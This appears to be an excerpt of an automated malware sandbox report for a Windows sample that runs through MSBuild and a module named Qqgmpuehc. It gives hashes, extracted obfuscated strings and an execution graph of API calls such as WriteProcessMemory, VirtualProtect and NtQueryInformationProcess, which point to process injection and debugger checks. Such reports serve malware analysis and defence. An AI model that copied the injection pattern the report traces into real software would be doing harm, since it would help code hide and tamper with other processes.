                          • Instruction ID: 2d6ed1de786c42a46a8a9613021d1f00df9384ddfaeb59629661aad9f4a0172a
                          • Opcode Fuzzy Hash: 6bb03151b00f114df8a2392ca51cc682b34d7ed1681022c59dae1286e6a8d0aa
                          • Instruction Fuzzy Hash: C7515C75B002058FDB04EF78C45496EBBF2BF89304B1449A9E546AB3A5EB35DC86CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ojq$(ojq$0$\sjq
                          • API String ID: 0-1831838980
                          • Opcode ID: 51fb55c5253de0bfcb27b2e318c70b39d83ca9ec3a72b08957609feceb801d64
                          • Instruction ID: 4e06d21e979b9d3ae9adb8b906e06114a78ca74c93d8818e24d5c7d31dad5ce2
                          • Opcode Fuzzy Hash: 51fb55c5253de0bfcb27b2e318c70b39d83ca9ec3a72b08957609feceb801d64
                          • Instruction Fuzzy Hash: 0CE0683071029ACFEB286E3D90A483E2E53BF4C6043584C6ACE02DB2A4DE728C044762

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:70
                          Total number of Limit Nodes:7
                          execution_graph 72545 6c4bb54b 42 API calls 2 library calls 72569 6c4bcbc9 6 API calls __dosmaperr 72546 6c4c004f 36 API calls 72508 6c4aacce 72509 6c4ad11c 72508->72509 72514 6c4a8ecb 72508->72514 72510 6c4b091e WriteProcessMemory 72509->72510 72509->72514 72511 6c4af9c6 72510->72511 72510->72514 72511->72514 72515 6c4a8c60 5 API calls _ValidateLocalCookies 72511->72515 72513 6c4af9cf 72513->72514 72515->72513 72570 6c4b6cc3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 72571 6c4bc3c3 42 API calls 2 library calls 72547 6c4bc347 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 72497 6c4b6edb 72498 6c4b6ee4 72497->72498 72505 6c4b7238 IsProcessorFeaturePresent 72498->72505 72500 6c4b6ef0 72506 6c4b7d0d 10 API calls 2 library calls 72500->72506 72502 6c4b6ef5 72503 6c4b6ef9 72502->72503 72507 6c4b7d3f 7 API calls 2 library calls 72502->72507 72505->72500 72506->72502 72507->72503 72516 6c4a11d0 72534 6c4a1238 CatchIt 72516->72534 72517 6c4a66b5 GetCurrentProcess 72536 6c4b7430 72517->72536 72519 6c4a66e2 GetModuleHandleA 72519->72534 72520 6c4a7164 CloseHandle 72520->72534 72521 6c4a76e3 K32GetModuleInformation GetModuleFileNameA 72521->72534 72522 6c4a70e2 FindCloseChangeNotification CloseHandle 72522->72534 72523 6c4a77dc CloseHandle 72523->72534 72524 6c4a6b60 MapViewOfFile 72524->72534 72525 6c4a687f K32GetModuleInformation GetModuleFileNameA 72525->72534 72526 6c4a7753 MapViewOfFile 72526->72534 72527 6c4a71fa 72537 6c4b6830 5 API calls _ValidateLocalCookies 72527->72537 72529 6c4a7204 72530 6c4a6931 CreateFileA 72530->72534 72531 6c4a6a19 CloseHandle 72531->72534 72532 6c4a69aa CreateFileMappingA 72532->72534 72533 6c4a6dc8 VirtualProtect 72533->72534 72534->72517 72534->72520 72534->72521 72534->72522 72534->72523 72534->72524 72534->72525 72534->72526 72534->72527 72534->72530 72534->72531 72534->72532 72534->72533 72535 6c4a6e72 VirtualProtect 72534->72535 72535->72534 72536->72519 
72537->72529 72548 6c4b7b50 6 API calls 4 library calls 72573 6c4c09d0 15 API calls 72550 6c4b6d67 15 API calls ___std_type_info_destroy_list 72551 6c4c1260 20 API calls __startOneArgErrorHandling 72552 6c4bed65 18 API calls __dosmaperr 72553 6c4b707a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 72538 6c4a85f0 GetModuleHandleW 72539 6c4a862b __FrameHandler3::FrameUnwindToState 72538->72539 72540 6c4a8802 NtQueryInformationProcess 72539->72540 72541 6c4a8c04 72539->72541 72540->72539 72544 6c4b6830 5 API calls _ValidateLocalCookies 72541->72544 72543 6c4a8c14 72544->72543 72555 6c4b6e77 14 API calls ___scrt_release_startup_lock 72557 6c4b7e0c 42 API calls 2 library calls 72558 6c4baf02 7 API calls 72559 6c4a1000 5 API calls _ValidateLocalCookies 72574 6c4ba080 25 API calls 3 library calls 72560 6c4bce06 17 API calls 72561 6c4b9d1b 37 API calls 2 library calls 72563 6c4b9013 45 API calls 2 library calls 72564 6c4be510 32 API calls 72576 6c4bf695 62 API calls 72565 6c4ba52b 6 API calls 72577 6c4b6eab 21 API calls 2 library calls 72579 6c4beaaf 15 API calls ___free_lconv_mon 72567 6c4bdf20 19 API calls 2 library calls 72586 6c4bc8bf 20 API calls ___free_lconv_mon 72587 6c4bbbbc 17 API calls 2 library calls 72589 6c4bcdb5 FreeLibrary
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2244579024.000000006C4A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C4A0000, based on PE: true
                          • Associated: 00000005.00000002.2244494965.000000006C4A0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2244737468.000000006C4C3000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2244808518.000000006C4CA000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2245565124.000000006C515000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2245639439.000000006C51F000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6c4a0000_Qqgmpuehc.jbxd
                          Similarity
                          • API ID: File$CloseModule$Handle$CreateInformationNameProtectViewVirtual$ChangeFindMappingNotification
                          • String ID: %89$("s$;s_G$=!Oe$@$KL1$KL1$MP{P$OZg$OZg$YhD$ax4$e\
                          • API String ID: 1881618098-839319396
                          • Opcode ID: 6950128e580e8a75fd33f817f132bf0b4797659a41047428981568c0be1c5cfa
                          • Instruction ID: f646f11ba688a7ddd426888802882bb5751a63300fd5cf534e6f4f2a085a3fb3
                          • Opcode Fuzzy Hash: 6950128e580e8a75fd33f817f132bf0b4797659a41047428981568c0be1c5cfa
                          • Instruction Fuzzy Hash: 73B32139A442458FCB14CEBCC995FC877F1AB63315F115289D418ABBA9DB369D8ACF00

                          Control-flow Graph

                          APIs
                          • WriteProcessMemory.KERNELBASE ref: 6C4B091E
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2244579024.000000006C4A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C4A0000, based on PE: true
                          • Associated: 00000005.00000002.2244494965.000000006C4A0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2244737468.000000006C4C3000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2244808518.000000006C4CA000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2245565124.000000006C515000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2245639439.000000006C51F000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6c4a0000_Qqgmpuehc.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID: '-$'?$($-2}$-7|Tg,>$1$=U(X$j0$uL7bREREFs2jSUo0v2MnQ0NaQ0NDQ7i+20RERBb7ltpJNL/qDENDWkNDQ0O4vttEREQWPpRXSTS/UCpDQ1pDQ0NDuL7bREREFtxgrEg0v8b1Q0NaQ0NDQ7i+20RERBbgxW$3$Y$E$!v$#3$#7$(K$)_$*3$*L$-&$1o$23$3'$;/$;B$;U$;~$<3$?E$AA$AN$Ar$By$D%$D)$EZ$F($G$H%$Mf$O|$QX$R;$U3$V7$VG$_'$_*$`c$aC$aa$df$e;$fo$g+$gO$hu$i&$i)$j/$jt$k@$kT$oA$p9$r.$s)$s:$vQ$wI$|$|+$~H$#$#$+$,$2$>$P$V$g
                          • API String ID: 3559483778-605755562
                          • Opcode ID: 532cd1aa45eb1ceeaea700b952b3b51bbcaceb9ee5ad42bcc7639ed3c78f09af
                          • Instruction ID: f46131901473d69c34cdf775db44a3ffbf196852c03d88a3b85a6433c469d2c9
                          • Opcode Fuzzy Hash: 532cd1aa45eb1ceeaea700b952b3b51bbcaceb9ee5ad42bcc7639ed3c78f09af
                          • Instruction Fuzzy Hash: 4063A43598D119CBE710CDBCCD88FDC76B0AB27344F508682D5A8A7E18C631DE978B96